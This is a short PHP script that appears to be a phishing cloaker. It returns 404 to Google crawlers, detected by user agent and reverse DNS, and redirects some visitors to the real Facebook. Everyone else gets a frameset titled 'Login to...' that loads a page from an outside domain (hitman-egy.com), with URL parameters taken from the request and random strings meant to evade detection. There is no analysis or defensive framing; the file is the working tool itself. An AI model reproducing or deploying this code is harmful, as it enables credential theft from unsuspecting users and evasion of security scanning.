<?php
 ini_set('display_errors','off'); 
 if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
$ua = $_SERVER['HTTP_USER_AGENT'];
	if ( \strpos($actual_link, 'facbook') !== false ) {
header('Location:https://web.facebook.com/'); 
die(); }else{
		function getrandomstring($length) {

       global $template;
       settype($template, "string");

       $template = "abcdefghijkl21345674854548401458748510487485284mnopqrstuvwxyz0123456789alqnaseslasmsyfjsdfhsdjhigjkldshdslkignshfdydjlkkahfkfhgyuwofdndhdkrulsajhfoasdkdfihjfdhkfkljuhfdokjfdjhjghiihejipieuhrujsokljdfjhjkhgknlfjiuohjgukoeojijhfeg45545uijdfhcghsdjkjkbjbo65746+5654987974658798745435165fdjyfrijgieryueriuoeoioieoipioekjkdcknhjdscgdskofjkfdsjjkfojppoadjhgvdfuokkfdhcffqrdsqhplsappdfakljndfjvfsOJKLSAHJFZNKLZMVGJHGJFDHJALURYEIWOPQHSJFNYETRQISOF547545121478854156415645145486786524168KJHFFDJUFDUJdjkghjkfdhlkfsdhufhswifhru==";
       /* this line can include numbers or not */

       settype($length, "integer");
       settype($rndstring, "string");
       settype($a, "integer");
       settype($b, "integer");

       for ($a = 0; $a <= $length; $a++) {
               $b = rand(0, strlen($template) - 1);
               $rndstring .= $template[$b];
       }

       return $rndstring; 
}
$gue2 = getrandomstring(50);
$url = trim($_GET['profile']);
$id= trim($_GET['i']);
$min = substr($url , strpos($url , '//'), 5000000 );
$link = 'https://hitman-egy.com/js/';
$actual_link = "http://" . $_SERVER[ HTTP_HOST ] . $_SERVER[ REQUEST_URI ];

echo '
<html>
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
    <meta name="viewport" content="width=device-width" />
<title>Login to...</title>
</head>
<frameset rows="*,3" hit="'.$gue2.'" frameborder="NO" border="50" framespacing="0">
<frame name="main" src="'.$link.$min.'&i='.$id.'&beauty='.$gue2.'">
<noframes>
<body bgcolor="#FFFFFF" text="#000000">
<a href="'.$link.$min.'&i='.$id.'&beauty='.$gue2.'">...START...</a>
</body>
</noframes>
</html>';
}
?>